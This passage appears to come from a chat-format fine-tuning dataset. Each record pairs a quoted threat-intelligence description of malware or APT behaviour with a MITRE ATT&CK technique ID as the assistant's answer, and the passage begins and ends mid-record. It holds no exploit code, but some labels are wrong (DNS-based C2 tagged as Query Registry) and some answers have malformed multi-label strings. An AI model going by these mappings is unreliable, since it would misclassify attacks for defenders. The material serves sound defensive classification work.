- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `net time` command as part of their advanced reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of enumerating and manipulating files and directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Details: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe. Writing an analytic looking for a process of esentutl.exe with Windows\\WebCache in the command line may help you catch this behavior"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The legitimate DLL that would be used in this case has the size of roughly 600 KB, but here we have an obfuscated library that is over 600 MB. The large size of the file is intended to hamper analysis and detection. Once all empty sections have been removed from the library, the final payload is a binary of 27.5 MB"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian can store copied files in a specific directory prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack has a C2 proxy tool that masquerades as \"GUP.exe\", which is software used by Notepad++."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can deobfuscate and re-assemble code strings for execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prikormka encrypts some C2 traffic with the Blowfish cipher."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The algorithm used by Dyre for generating the AES and IV from the first 48 bytes of data based on a rehashing scheme was commonly referred to as Dyre’s derive_key function, this function was slightly changed in the new bot"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy can create new users on an infected system."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant can perform dynamic DLL importing and API lookups using \"LoadLibrary\" and \"GetProcAddress\" on obfuscated strings."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware SierraAlfa accesses the \"ADMIN$\" share via SMB to conduct lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 ) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days."
- },
- {
- "role": "assistant",
- "content": "T1584.005 - Botnet', 'T1588.006 - Vulnerabilities', 'T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 replaces the Sticky Keys binary \"C:\\Windows\\System32\\sethc.exe\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Gamaredon Group file stealer can gather the victim's username to send to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can obtain the id of a logged in user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This time, the text is from the novel \"The Brothers Karamazov\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. For example, the variables are stored in a \"Constant.py\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used HTTP requests for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT has a command to periodically take screenshots of the system."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used Windows admin shares to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used HTTP for C2, including sending error codes in Cookie headers."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim's network by copying itself over network shares"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In contrast to the two samples used in these attacks, this one did not use a PE attachment, and instead used a Microsoft Word document containing a malicious macro as the delivery vehicle"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conclusion CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OilRig group maintains their persistent attacks against government entities in the Middle East region using previously identified tools and tactics. In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment. The attachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of OopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems. Attack Details In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT. The email subject was in Arabic, which translated to “Business continuity management training”. The email was sent to an address belonging to a user group, rather than a specific individual’s email address. Evasion Techniques The OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox checks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its functional code"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It uses the Windows service “winmgmts:\\\\.\\root\\SecurityCenter2 ” to check all AntiVirus products installed on the operating system. As shown below in the figure, it is done by creating the object the service “ winmgmts:\\\\.\\root\\SecurityCenter2 ” and executes the query “ Select * From AntiVirusProduct ” by using the same object that is created of a mentioned service"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Derusbi malware supports timestomping."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has the ability to download additional modules and a configuration file from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has the ability to delete files on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - Screen Capture Tool— This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR — This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell can obtain the victim IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can be used to conduct packet captures on target hosts."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses COM hijacking as a method of persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Much of the code inside the script is from the library “js-cookie” version 2.2.1. However, the attackers modified it and integrated a credit card skimmer into the original script. The skimmer binds at the events “mousedown” and “touchstart” of the payment submit button"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to \"openssl\" and then write the payload to the \"/tmp\" folder."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "discovers the current domain information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dns.ps1 script is also responsible for communicating with the C2 server, but it uses DNS queries to send data to the server. The DNS queries sent by this script are queries to subdomains on the same domain as the C2 server, which contains system information or the contents of files from the system. The subdomain of the DNS request that acts as the initial C2 beacon has the following structure"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has utilized Zlib compression to obfuscate the communications payload."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit"
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can install a new service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS establishes a backdoor over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy documents, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves can enumerate drives and Remote Desktop sessions."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The White Company has sent phishing emails with malicious Microsoft Word attachments to victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another batch script run by a scheduled task renames the archives on the file server (see Figure 15)"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE has relied on victims opening a malicious Excel file for execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used DropBox URLs to deliver variants of PlugX."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider obtained a code signing certificate signed by Digicert for some of its malware."
- },
- {
- "role": "assistant",
- "content": "T1588.003 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has the capability to to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used HTTP for network communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The websites contain numerous articles and content to make them seem legitimate; in some cases the websites have over 10,000 individual news articles. Volexity has found the content is largely scraped and reposted in full from various other legitimate online news outlets. This appears to be done in an automated fashion and most likely through WordPress plugins. Numerous posted articles and images can be directly tracked back to other online blogs and newspapers; sometimes the byline or even watermark in images show directly where the article was sourced. In some cases, only a small number of pages on the site contains malicious code; in other cases, the profiling code is pervasive"
- },
- {
- "role": "assistant",
- "content": "T1608.004 - Drive-by Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NavRAT uses the email platform, Naver, for C2 communications, leveraging SMTP."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST collected hostname, OS version, and device uptime."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail can receive data and executable scripts from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy uses the \"tasklist\" and \"wmic process get Capture, ExecutablePath\" commands to gather the processes running on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path “/FeedBack.php”"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer can gather the IP address from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Limited obfuscation was encountered, where the authors split up strings into smaller sub-strings and used ‘strcpy’ and ‘strcat’ calls to re-build them prior to use. They also used this same technique to generate garbage strings that are never used. Comments have been added to show the fully-generated strings"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
